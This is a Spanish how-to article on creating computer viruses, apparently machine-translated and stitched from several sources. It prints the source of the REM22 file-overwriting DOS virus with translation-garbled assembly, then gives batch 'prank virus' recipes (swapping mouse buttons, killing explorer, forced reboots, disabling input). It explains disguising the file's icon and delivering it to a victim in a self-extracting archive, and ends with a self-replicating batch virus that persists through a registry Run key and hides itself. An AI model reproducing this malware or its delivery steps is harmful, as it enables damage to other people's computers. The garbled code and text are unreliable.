¿Cómo crear un virus? Virus informáticos. Cómo hacer un virus de broma. ¿Cómo crear y escribir un virus informático? Cómo hacer virus en el bloc de notas como un murciélago.

“Caminó durante mucho tiempo en un bulto incómodo y duro, temblaba y se balanceaba, su cuerpo pedía comida. No entendía por qué él, que acababa de nacer, fue expulsado de la casa... Finalmente, el. El temblor cesó, y alguien más y el rudo abrieron el archivo adjunto a la carta. Un virus joven y curioso asomó la cabeza e hizo su primera división..."

En este artículo compartiré mi experiencia escribiendo virus. El principio básico del funcionamiento de cualquier virus se puede expresar en pocas palabras: el cuerpo del virus se trata como código durante su ejecución y como datos durante la infección. Existen muchos tipos de virus y diferentes métodos de infección. Naturalmente, el mecanismo mismo de acción del virus depende del sistema operativo específico. Hay, por ejemplo, virus que funcionan en el modo protegido del procesador (modo máximo
privilegios y direccionamiento absoluto de toda la memoria). Empresas como AVP tienen que dedicar mucho tiempo y recursos a tratar estos casos. Lo único que salva a los creadores de antivirus es el reducido número de virus verdaderamente profesionales.

Para aprender a escribir virus usted mismo, sólo necesita conocer los conceptos básicos del ensamblador. Quiero decir que con conocimientos básicos puedes intentar escribir tus propios virus e investigar los existentes. Otros útiles, y a veces necesarios,
El conocimiento vendrá a medida que estudies las creaciones de otras personas. Entre los recursos sobre este tema, puedo recomendar una página que contiene una gran cantidad de libros y artículos:
http://vx.netlux.org/lib_rus.shtml.
Todos sus documentos están escritos en un lenguaje muy comprensible y accesible.
idioma. También existe una conocida revista electrónica, Infected Voice. Tiene un conveniente sistema de navegación que le permite navegar por nuevos materiales (fuentes y artículos). Esta revista se publica una vez cada seis meses (al menos antes, ahora no estoy seguro) y contiene todas las novedades en este ámbito.

Supongamos que encontró la fuente de un virus y desea investigarlo. ¿Cómo hacer esto? Para ser honesto, yo mismo me encontré con un problema así por primera vez. Mi pregunta se convirtió en esta: tengo el texto de un virus, quiero ver cómo funciona y, al mismo tiempo, ¡TENGO MIEDO! Esto es completamente real: ¿qué evitará que este virus queme mi CMOS o me roce el tornillo? Respuesta: nada. Si actúa incorrectamente, el virus puede causarle el daño para el que está programado. Sin embargo, el algoritmo para acciones correctas es bastante simple. Ahora lo resolveremos.

Supondremos que el código fuente del virus está escrito en lenguaje ensamblador. Este lenguaje es ideal para escribir virus. Como es sabido, en
El ensamblador tiene sólo dos comandos que llaman "reales" (es decir, acciones que pueden producir
cambios irreversibles en el disco duro o en otro lugar) son "INT" y "OUT", todos los demás comandos funcionan con registros e indicadores del procesador (aunque de manera bastante aproximada, pero en general cierto). No consideramos las funciones de WIN API, ya que, en principio, pueden considerarse un reemplazo de las interrupciones de DOS, y llamarlas es un reemplazo del comando.
"ENTRADO".

Un poco de información para principiantes o aquellos que no han escrito en ACMA durante mucho tiempo: el comando "INT" se usa para llamar a interrupciones de DOS o BIOS, y el comando "OUT" se usa para escribir datos en el puerto. En este caso, para el comando "INT", el número de función se indica en el registro AH (con mayor frecuencia), y
para el comando "OUT", los registros AL, AX, EAX almacenan datos escritos en el puerto.

Entonces. Tome cualquier depurador. Dado que primero debe comprender los virus en DOS (todavía funcionan en
Win), entonces cualquier depurador servirá: Turbo Debugger de Borland Inc., CodeView de MicroSoft, AFDPRO o AVPUTIL. A continuación, cargue el código fuente en el depurador y rastree paso a paso. Lo principal es ceñirse a UNA SOLA REGLA. Se le puede llamar dorado.
ATENCIÓN: puede ejecutar de forma segura el código fuente de su virus, pero tan pronto como llegue a los comandos “OUT” o “INT”, deténgase inmediatamente y comience a analizar.

Debes analizar:

  • número del puerto de interrupción o grabación llamado;
  • número de la función llamada o datos escritos en el puerto.

Para comprender las acciones reales de estos comandos, utilice la Ayuda técnica, cualquier documento de ASMA o cualquier
libro. Lo principal es que puede encontrar información sobre todas las interrupciones y puertos en su fuente.
Para que puedas entender lo que hará
el siguiente comando sin ejecutarlo en su computadora. Mientras realiza el seguimiento, registre todos los datos (estados de registro, direcciones de comando,
llamadas funciones, etc.) en una hoja de papel. Luego, cuando llame a la función (o escriba en el puerto), estará completamente armado y podrá determinar qué sucederá si ejecuta el siguiente comando. Esto también le ayudará con un análisis comparativo de cambios en registros y banderas.

Una vez que comprenda lo que hace un comando ("INT" o "OUT"), sáltelo y continúe hasta que
Encontrará el final del archivo o el siguiente comando de este tipo. Como resultado, podrá separar cualquier virus en pedazos y comprender su funcionamiento.

Veamos un ejemplo. Para ello, tomé un pequeño virus escrito por cierto Recordatorio que obtuve del undécimo número de Infected Voice. Él estuvo allí sin hacer comentarios, así que tuve que hacer todo el trabajo yo mismo. que yo
Lo que me atrajo de esta creación: el código fuente muy pequeño, el tamaño muy pequeño del ejecutable compilado, el algoritmo incomprensible (a primera vista). Aquí está su código fuente (por cierto, se llama REM22):

modelo diminuto
.código
.puesta en marcha
comenzar:
pop cx
hola:
xchg hacha, bx
db 108h shr 1
db 4eh; diciembre si
db 9eh shr 1
db 3 canales ;cmp al,xx
db 100h shr 1
db 40h
máscara de datos db "*.*",0
lodsw
cwd
mov dl,al
shl dx,1
entre 21h
jmp hel
fin

Este virus, en mi opinión, es una obra maestra, porque con un tamaño tan pequeño
Organizar el mecanismo de reproducción es verdaderamente una obra de genio. Cuando ahora averigüemos qué y cómo lo hace, todo
caerá en su lugar. Mientras tanto, cabe señalar: en principio, este virus no realiza ninguna acción destructiva (creo que la reproducción no puede considerarse tal), pero infecta todos los archivos.
en el mismo directorio. No es un virus “profesional”, es decir, carece de muchos mecanismos propios de creaciones serias:

  • no existe un mecanismo “amigo/enemigo” (el virus infecta a todos indiscriminadamente, incluso a sí mismo o a objetos ya infectados);
  • la infección ocurre solo en archivos en el mismo directorio (intente compilarlo y ejecutarlo en una carpeta donde, además de él,
    no hay nadie :));
  • el virus no es polimórfico (no se cifra ni cambia su código);
  • el virus no tiene efectos destructivos;
  • el virus no es residente.

Echemos un vistazo al interior de nuestra
sobreescritor. La fuente es un modelo para crear un archivo exe. ".startup" es una directiva TASM, puedes prescindir de ella, pero luego tienes que escribir "org 100h" y luego poner una marca (y
al final, después de "end", poner el nombre de la etiqueta). El resto de comandos los puedes encontrar fácilmente en cualquier libro y ver qué hacen (no seas holgazán). Todo lo que queda es descubrir qué hacen estos equipos juntos en su conjunto.

Esta obra maestra es un ciclo ordinario que se repite 6 veces. ¿Qué sucede en el ciclo? Lo que pasa es que llamamos al int 21h con seis funciones diferentes (93, 4E, 3C, 40, 2E, 00). miremos
en orden, significa:

"pop cx" es sólo para restablecer cx (en la parte superior de la pila, como sabes, al comienzo del programa hay un cero). ¿Para qué? Y para obtener CH=01 en el comando SUB CH (búsquelo, debe estar en el desplazamiento 108h en el depurador) (en el desplazamiento 2Ah (esto está en algún lugar de la PSP) siempre se encuentra FFh), es decir No puedes presumir y simplemente escribir sub ch,ffh, pero esto cambiará el código del programa... Resulta:
*.*,0 = sub CH,, y esta es una máscara ya preparada para buscar... ¡¡¡AHÍ ES DONDE ESTÁ EL GENIO!!!

Es decir, sub ch,ffh es "Ae" (en códigos ASCII con un espacio al final). Además, todo lo que va desde el desplazamiento 101 (código 93) hasta el desplazamiento 10B (código 00) son FUNCIONES PARA int 21h. Aquellos. Estas son 6 funciones que llamamos a su vez en un bucle (vea sus números arriba), y el código que sale es solo oropel. ¡Esto NO TIENE ABSOLUTAMENTE SENTIDO! ESTO ES LO QUE PASÓ SI MONTASTE LAS FUNCIONES EN FILA. Es decir, si escribo TANAT, se traducirá en una secuencia de algunos comandos, ¿verdad? Pero esto son esencialmente datos... aunque en este programa ni siquiera puedes llamarlos datos, estas son solo FUNCIONES para int 21h, eso es lo que
¡¡¡GENIO!!! No tiene sentido decir más, porque en cada uno de los seis ciclos se llama a una función y todos los registros son aproximadamente
adaptado a ideales... Mira:

Por primera vez, la función 93h se llama: Pipe (Error) - para el programa en sí, NO REALIZA NINGUNA CARGA, NO HACE NADA ÚTIL, ES SIMPLEMENTE EXCESIVO, NO ES NECESARIO, ES UN CICLO EXTRA, PERO CONSIDERANDO el genialidad del código, simplemente SURGE POR SÍ MISMO Y NO PUEDES LLEGAR A NINGUNA PARTE DE ELLA!!! Habrá otra función "izquierda" similar; consulte más abajo.

Segundo: 4Eh, ¡esto es lo que necesitamos! Busque un archivo y, en el momento de la llamada, el desplazamiento de la máscara del archivo (108h) se encuentra en dx.

Tercero: 3Ch - creación de archivos. Esta es otra función "izquierda". No la necesitamos. No es necesario que creemos un archivo (después de todo, solo necesitamos escribirnos en el archivo que encontramos en el paso anterior). En DX hay algo de basura para zurdos, naturalmente con
el nombre del archivo no tiene nada que ver con eso, entonces CF=1 y pasamos al siguiente bucle.

Cuarto: 40h - Escribir al archivo. ¡Pero esto es lo que ya necesitamos! DX contiene un desplazamiento de 100h (es decir, el comienzo de REM22), pero CX es un poco decepcionante: es igual a 400h, es decir. en realidad al principio del archivo encontrado
Se escribirán 400h bytes, mientras que REM22 sólo ocupa 22 bytes, es decir Se escribirán 1002 bytes adicionales. Eso es cierto. Pero dada la genialidad del código :), esto se puede perdonar.

Quinto: 2Eh - Establecer bandera de verificación. Esta es la función MÁS A LA IZQUIERDA, aquí es simplemente el apéndice del programa.

Sexto: 00h: esto resulta ser una salida del programa (yo tampoco lo sabía).

Eso es todo: es decir, tenemos 6 ciclos, de los cuales sólo 3 son significativos: buscar, grabar y salir.
Lo más probable es que te pierdas mucho.
claro. Para resolverlo, cargue la fuente en el depurador, rastree, mire
Para conocer el estado de los datos en los registros, mira mis comentarios. Entonces todo quedará claro. En conclusión
Le proporciono una tabla de depuración para que no tenga que crearla usted mismo (verá cómo debería verse). En principio, uno debería ser suficiente,
para entender lo que está pasando con este virus, pero creo que los comentarios no serán superfluos.

ADR CÓDIGO A.S.M. 1 2 3 4 5 6
100 59 POP-CX CX = 0 - - - - -
101 93 XCHG AX, BX HACHA =BX=0 HACHA =0, BX=9300h HACHA =9300h, BX=0 AX=0, BX=0005h AX=0005h, BX=0400h AX=0400h, BX=2E00h
102 84 4E 4F PRUEBA B+4Fh,
C.L.
- - - - - -
105 3C 80 CMP AL,
80h
- - - - - -
107 40 INC AX HACHA =0001h HACHA =0001h HACHA =9301h HACHA =0001h AX=0006h AX=0401h
108 2A 2E 2A 00 SUB CANAL,B CX=0100h CX=0200h CX=0300h CX=0400h CX=0500h CX=0600h
10C ANUNCIO LODSW (DS:SI->AX) HACHA=DS:
100=9359h
HACHA=DS:
102=4E84h
HACHA=DS:
104=3C4Fh
HACHA=DS:
106=4080h
HACHA=DS:
108=2E2Ah
HACHA=DS:
10A=002Ah
10D 99 CWD (DX=E(AX)) DX =FFFFh DX=0000h DX=0000h DX=0000h DX=0000h DX=0000h
10E 8A D0 MOV DL, AL DX=FF59h DX=0084h DX=004Fh DX=0080h DX=002Ah DX=002Ah
110 D1 E2 SHL DX, 1 DX=FEB2h DX=0108h DX=009Eh DX=0100h DX=0054h DX=0054h
112 CD 21 ENT 21h AH =93 (tubería) - Error AH = 4E
(Buscar primero)
AH = 3C (Crear archivo) AH = 40 (Escribir archivo) AH = 2E (Establecer bandera de verificación) AH =00 (Terminar)
114 EB EB JMP CORTO 101 ??? - - - ??? -

Curiosamente, no sólo los genios de la informática y los programadores inteligentes están interesados ​​en información sobre cómo crear un virus, sino también los usuarios comunes de computadoras personales. A veces, las personas vengativas intentan deliberadamente dañar a la víctima creando software malicioso, pero la mayoría de las veces esto es solo un engaño cibernético. Cualquier penetración en una computadora por parte de terceros o daño deliberado al software está penado por las leyes de muchos países. Este artículo sobre cómo crear un virus sólo puede utilizarse para ayudar al usuario a comprender cómo se utilizan los comandos de Windows NT.

Creación de un virus

Cada usuario novato de PC puede crear su propio virus informático. Para ello no es necesario en absoluto tener conocimientos de programación. Basta tener ganas, un poco de tiempo libre para entender los comandos más sencillos y, por supuesto, un ordenador. Este artículo le enseñará cómo crear un virus en el Bloc de notas. En este caso trabajaremos sin varios intérpretes; no colocaremos el código en entornos de desarrollo especializados. ¿Cuál es la esencia de este método? Nuestro programa (virus) se ejecutará convirtiendo un archivo de texto en un archivo por lotes de Windows con una extensión (*.bat). Una vez iniciado, se ejecutarán todos los eventos que especifique en el archivo ejecutable. Ahora que, en teoría, sabe cómo crear un virus, puede pasar a un estudio más detallado de este tema. Quiero advertirles que estos virus no están destinados a cosas serias. Aunque pueden dañar tu computadora, la magnitud de la tragedia es pequeña. No podrás robar información de la víctima y mucho menos espiarla. Es hora de mostrarte cómo crear un virus. Para ello, le aconsejo que aprenda a utilizar los comandos de control de Windows NT, algunos de los cuales se describirán a continuación. Abra un editor de texto normal y escriba el siguiente comando: @echo off.

Felicitaciones, ha desactivado la pantalla de progreso. Ahora, después de ejecutar su virus, la víctima no sabrá acerca de la ejecución del código malicioso, porque todo el proceso estará oculto a sus ojos. A continuación, en una nueva línea, escriba el siguiente código: %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul.

No tiene sentido explicar cada comando, pero lo esencial es que los botones del mouse ahora están programados en orden inverso (las asignaciones de los botones se han intercambiado). Ahora guarde este archivo y cambie su extensión (en lugar de *.txt ponga *.bat). Aquí hay un archivo por lotes de Windows, después de ejecutarlo, su mouse no funcionará correctamente. Tienes un ejemplo claro de cómo crear un virus y, si esto te interesa, puedes seguir estudiando este tipo de comandos y profundizar en este nicho. Si quieres asustar seriamente a tu víctima, puedes agregar las siguientes líneas:

taskkill /f /im explorer.exe >nul
apagado -r -t 1 -c "jajaja" -f >nul

La primera línea es para deshabilitar el proceso "explorer.exe" y la siguiente línea es simplemente reiniciar la computadora. Su tarea es agregar nuevos comandos a su virus desde una nueva línea, luego guardar el archivo y cambiar su extensión. Eres casi un hacker. Ahora pasemos este archivo a la víctima. Debe colocar el archivo creado con la extensión bat en un archivo SFX especial, después de seleccionar la opción "Ejecutar después de descomprimir". Ahora la computadora de la víctima quedará automáticamente infectada con este virus después de abrir el archivo. Ya sólo queda enviar nuestro “regalo”.

Ya todo ha sido inventado.

Pero ¿por qué reinventar la rueda si programadores y hackers experimentados nos han hecho la vida mucho más fácil? En el dominio público, puede encontrar fácilmente un programa llamado "Kuzya Virus Generator". No necesitará escribir todos los comandos manualmente. Sólo necesita seleccionar la acción deseada y el programa creará automáticamente este archivo malicioso.

Este es un software cuyo propósito es obtener acceso no autorizado a recursos informáticos o información en el disco duro. A menudo se crea para causar daño copiando, distorsionando, eliminando o sustituyendo información. Veamos más a fondo cómo crear un virus de broma y protegernos de los virus.

¿Qué es un virus?

Antes de crear un virus, es necesario definir exactamente qué es. Para que un programa sea considerado malicioso debe:

  • destruir información o interrumpir el funcionamiento de la computadora;
  • realizarse sin previo aviso;
  • tener una finalidad clara de acceso no autorizado o destrucción de información.

Los virus informáticos deben cumplir todos los criterios anteriores. Por ejemplo, un cracker de protección contra copia no es malware. No destruye archivos, solo selecciona una contraseña para desbloquearlos. Además, un programa para formatear un disco no puede considerarse malicioso. Destruye datos en la computadora, pero se realiza con el consentimiento del usuario. Si un programa destruye información debido a errores internos, tampoco se considera un virus. Aunque los desarrolladores pueden ser responsables por negligencia en su trabajo o como violadores de los derechos del consumidor, porque el programa podría borrar datos importantes. En general, aún no se han definido criterios claros. Para que un programa sea considerado virus, se realiza un examen técnico y de software.

tipos de virus

¿Por qué se crean los virus? Hay muchas razones. Algunos de los archivos maliciosos son realmente peligrosos y pueden dañar el rendimiento de la máquina, mientras que otros causan daños indirectamente. Lista de objetivos principales:

  1. Desestabilización.
  2. Instalación de otro malware.
  3. Robo, fraude, espionaje.
  4. Programa publicitario.
  5. Otro.

Los virus informáticos crean interferencias, esto puede ser la apertura y cierre involuntario de la unidad de disco o un fallo del hardware.

Algunos programas se comportan de forma bastante astuta. La descarga de archivos multimedia desde un enlace infectado puede provocar la descarga de malware.

Para robar cualquier información se utiliza escanear el disco duro, registrar las pulsaciones de teclas y redirigir al usuario a un sitio web falso. Así, se roban cuentas y se utilizan para enviar spam, se piratean sistemas de pago y se bloquean ordenadores para extorsionar. Puede ser un software pago que no hace nada útil después de descargarlo.

Debido a un archivo dañado, se puede configurar un servidor proxy público en una computadora, la máquina se convertirá en miembro de una botnet y se utilizará para llevar a cabo ataques DDOS. Con la popularización de Bitcoin, los casos de minería oculta en las PC de los usuarios se han vuelto más frecuentes.

También existen programas que muestran anuncios o recopilan información diversa con fines de marketing.

Cómo crear virus

En el Bloc de notas (o mejor dicho, en cualquier editor de texto) puede crear un programa malicioso y puede hacerlo de la misma manera que crea programas normales. Se utilizan todos los lenguajes de programación. Normalmente es C++, pero puede ser Delphi y .Net. El propósito de crear un virus podría ser una broma o una introducción a su funcionamiento. Un programa simple se escribe directamente en el Bloc de notas y el código en sí ocupa muy pocas líneas.

Puede evitar por completo que un virus ingrese a su computadora apagando Internet y negándose a utilizar software ilegal. Los archivos que contienen virus pueden funcionar sin conexión a Internet. En este caso, dañarán la información del disco duro del usuario o provocarán que los programas funcionen incorrectamente.

Hoy en día, el principal objetivo de los piratas informáticos no es desarrollar programas destructivos que perjudiquen claramente el funcionamiento del sistema, sino crear productos que se comporten de forma silenciosa. Pueden funcionar durante mucho tiempo y en algún momento causar daños muy graves.

Signos de infección

Antes de crear un virus, los atacantes analizan todas las formas en que se puede detectar e intentan evitarlas. Los antivirus encuentran eficazmente archivos maliciosos, pero debido a un error del usuario, algunos de ellos pueden agregarse a las excepciones. Para reaccionar a tiempo cuando su computadora está infectada, necesita monitorear acciones sospechosas y extrañas.

Los signos más evidentes de infección:

  • abrir ventanas con contenido desconocido;
  • bloquear el acceso a sitios;
  • procesos de terceros en el "Administrador de tareas";
  • nuevas entradas en ejecución automática;
  • incapacidad para realizar cambios en la configuración de la computadora;
  • Reinicio o apagado aleatorio de la computadora.

Algunos de los síntomas pueden ser causados ​​por un virus de broma y no representan una amenaza clara para el sistema. Y algunos de ellos se utilizan para distraer la atención mientras el virus principal recopila datos sobre el usuario.

Propagación de virus

El ataque tiene varias etapas. El primero responde a la pregunta de cómo crear un virus, es decir, esta es una etapa tecnológica. La segunda etapa entrega malware a la computadora. Las principales formas en que se propagan los virus:

  • el exploit utiliza vulnerabilidades en el software, con la ayuda de las cuales toma el control del sistema e interrumpe su funcionamiento;
  • una bomba lógica se activa bajo una determinada condición y es inseparable del programa portador en el que está integrada;
  • un programa troyano penetra en un ordenador disfrazado de software legítimo, muy a menudo como parte de un ataque planificado de varias etapas;
  • Los gusanos se propagan de forma independiente a través de redes locales y globales utilizando errores administrativos y herramientas de ingeniería social.

Prevención y tratamiento

Existen antivirus para protegerse contra los virus. Protegen eficazmente el sistema, pero, por regla general, el culpable de infectar el sistema es el propio usuario. Por lo tanto necesitas:

  • instalar actualizaciones de manera oportuna y utilizar copias con licencia;
  • trabajar en la computadora con derechos de usuario, no con derechos de administrador;
  • abra archivos de computadora solo de fuentes confiables;
  • utilizar un cortafuegos.

Cómo hacer un virus de broma

Un virus es, ante todo, un programa que cambia el contenido de cualquier archivo. Se crea de la misma forma que cualquier otro programa. Las versiones más simples de malware se pueden crear en el Bloc de notas. Esto no requiere habilidades especiales ni conocimientos de lenguajes de programación.

¿Cómo crear virus en el Bloc de notas?

Las siguientes líneas crearán 1000 carpetas en un segundo, lo que confundirá al usuario:

¿Cómo crear un virus para robar contraseñas? Ya es más difícil responder a esta pregunta. Para hacer esto, debe pensar en cómo el usuario ejecutará el archivo malicioso y cómo se robarán los datos. Sólo entonces podremos comenzar la implementación. Este es un proceso muy complejo. Además, puede ser ilegal, por lo que no recomendamos a los lectores crear virus con ningún fin (excepto, por supuesto, con fines educativos).

Los virus se escriben, por regla general, para arruinar la vida de otra persona: "devorar" el espacio libre en su PC, desactivar el sistema, "piratear" contraseñas, etc. A pesar de tales consecuencias, hay virus creados solo para tener una risa sobre un amigo. Un virus de este tipo se escribe en cinco minutos y no hace nada crítico para el sistema. Los virus de broma más comunes son apagar la PC, abrir el mismo programa varias veces y mostrar texto divertido.

Estos virus simples se crean en un Bloc de notas estándar, excepto que no se guardan con resolución .txt, sino en el formato de archivo por lotes .bat.

Cómo hacer un virus

Consideremos paso a paso cómo escribir un virus que abra una aplicación varias veces.

  1. Abra el Bloc de notas; para hacer esto, haga clic derecho en el escritorio y seleccione "Nuevo" → "Documento de texto".
  2. Empezamos a llenar nuestro virus de comandos.
    • @echo off //deshabilitar la salida del comando en esta línea
    • echo "proceso iniciado" //texto que verá el usuario
    • iniciar mspaint
    • goto:p //ejecuta el programa de pintura varias veces
    • pausa //presiona cualquier tecla
    • del %0 //autodestrucción del virus
  3. Para el archivo guardado, cambie el ícono por uno más popular (navegador, Word, etc.) e ingrese el nombre apropiado.

Algunos sorteos más posibles:

Una especie de salvapantallas de la película "The Matrix"

  • @eco apagado
  • color 2
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • eco 1185585851851891704148 1185585851851891704148
  • ir a:a
  • pausa

Cambiar el funcionamiento de los botones del mouse

  • %SystemRoot%/system32/rundll32 usuario32, SwapMouseButton >nul

cambio de hora

  • hora 0:00

Deshabilitar el teclado

  • teclado rundll32, deshabilitar

Deshabilitar el mouse

  • ratón rundll32, desactivar

Analizamos las formas más simples e inofensivas de malcriar a un amigo. De hecho, al estudiar los comandos del sistema, puede "destruir" irrevocablemente el sistema en la computadora de otra persona (e incluso en el suyo propio por negligencia).

También puedes conocer la existencia de diferentes tipos de virus en el artículo, pero no debes profundizar en este tema para no crear problemas innecesarios para ti y los demás. Es mejor encargarse de proteger su propia computadora e instalar un programa antivirus confiable para que usted mismo no caiga en la broma de un amigo o enemigo.

La creación de los virus más simples no requiere entornos especiales de desarrollo de software. Y, por cierto, también conocimientos especiales. Crear virus es bastante sencillo si utiliza la línea de comando. Para hacer esto, necesita conocer un poco la sintaxis de la línea de comandos y poder crear archivos .bat.

¿Qué es un archivo .bat y cómo crearlo?

Muy superficialmente, se trata de archivos con la extensión .bat. Estos archivos contienen comandos que deben ser ejecutados por el intérprete de comandos de Windows. Todos aquellos comandos que se pueden ejecutar en la ventana de la línea de comandos se pueden ingresar en un archivo .bat y ejecutar. El resultado será el mismo.

Para crear un virus .bat, necesitamos un editor de texto normal. Idealmente, el Bloc de notas es adecuado para estos fines. Después de crear y abrir un nuevo documento de texto, debe ingresar allí el código (comandos) que debe ejecutar. Después de esto, necesitas usar el menú. Guardar como guarde este archivo dándole un nombre con la extensión .murciélago y especificando el tipo de archivo Todos los archivos.

Creando un virus simple

En este artículo veremos cómo crear un virus que, una vez iniciado, abrirá sin cesar una ventana de línea de comando. Las ventanas de línea de comando que se abren sin cesar y muy rápidamente no permitirán al usuario trabajar en paz. Nadie tendrá tiempo de cerrarlos todos y muy pronto llenarán la RAM de la computadora, lo que a su vez ralentizará considerablemente el funcionamiento de la computadora, incluso hasta el punto de congelarse por completo. Se verá así:

Además, agregaremos nuestro virus a la carga automática, lo que garantizará que el virus se inicie automáticamente junto con el sistema operativo.

Código del virus creado.

Cuántos programadores, tantas soluciones diferentes se pueden inventar para cada problema. Daré uno de mis métodos para resolver tal problema.

mdc:\papka
inicio de eco c:\papka\virus.bat>c:\papka\virus.bat
reg agregar HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat
atributo +r +h +s c:\papka
atributo +r +h +s c:\papka\virus.bat
iniciar c:\papka\virus.bat
del %0

Ahora veamos el código en sí. La primera línea crea una carpeta llamada papka en la raíz del disco DO:/. Esta dirección se proporciona sólo como ejemplo. Usar la raíz de la carpeta C:/ no es una muy buena opción para un virus. Si desea garantizar una buena supervivencia de su virus, es mejor esconderlo. Incluso puedes omitir el primer comando si colocas el virus en un directorio ya creado.

La segunda línea crea el archivo. c:\papka\virus.bat y, usando el comando echo, ingresa el comando en él iniciar c:\papka\virus.bat. Aquí debe saber que después del signo > se indica la ubicación de la salida del comando dado. Aquí necesitas familiarizarte: c:\papka\virus.bat y allí está el cuerpo principal del virus. El archivo .bat con el código que creamos, que ahora estamos analizando, es sólo el instalador de nuestro virus principal. Puede utilizar un nombre y una ubicación diferentes para el virus.

La tercera línea pone el cuerpo del virus que creamos en la segunda línea en carga automática. Para ello se utiliza una rama de registro de usuarios, ya que el usuario siempre tiene acceso a ella. Pero utilizar el inicio de la computadora no es seguro, ya que es posible que el usuario no tenga acceso administrativo, lo que provocará un error innecesario.

La cuarta y quinta líneas de código cambian los atributos del virus y la carpeta donde está almacenado el virus. Con estos comandos, y para ello usamos , agregamos atributos Sólo lectura, oculto y sistema tanto para la carpeta como para el virus. Uso de atributos r(sólo lectura) opcional. Y aquí están los atributos. Oculto y sistémico Protegerá bien el virus que creamos. Si no me cree, lea el artículo sobre el virus que. Utiliza exactamente esta tecnología.

La sexta línea de código lanza nuestro virus. Puede omitir este punto si desea que el virus se ejecute por primera vez solo después de reiniciar su computadora.

Y finalmente, la última línea, séptima, elimina este virus .bat. Esto es útil porque al usar este archivo .bat puedes encontrar fácilmente el virus que creamos y eliminarlo.

El significado del virus creado.

El objetivo del virus, que encaja en estas 7 líneas, es crear el virus principal, protegerlo y asegurar su funcionamiento constante. Y también cubre tus huellas. ¿Qué hace el virus principal? Una vez que se inicia el virus principal, ejecuta el comando que está escrito en él. Y este comando, a su vez, lanza nuestro virus, que nuevamente se lanza nuevamente. Y así hasta el infinito.

¿Cómo combatir estos virus?

En primer lugar, la lucha contra este virus comenzará después de su inicio. Muy pronto el virus llenará tu RAM con copias del mismo y ni siquiera podrás mover el mouse. Por lo tanto, dicha actuación debe interrumpirse inmediatamente. El botón Pausa de tu teclado es perfecto para esto. Presiónelo el tiempo que sea necesario para que dejen de crearse nuevas copias. En teclados sin botón Break, el método abreviado de teclado Ctrl+C puede resultar útil.

¿Cómo eliminar tal virus?

Puedes hacerlo a través de su entrada en inicio (más detalles en el enlace). También puede encontrar el virus usando un comando que se mostrará en la ventana del intérprete de comandos. Naturalmente, si puede acceder al archivo oculto y del sistema. Así se crea un virus simple.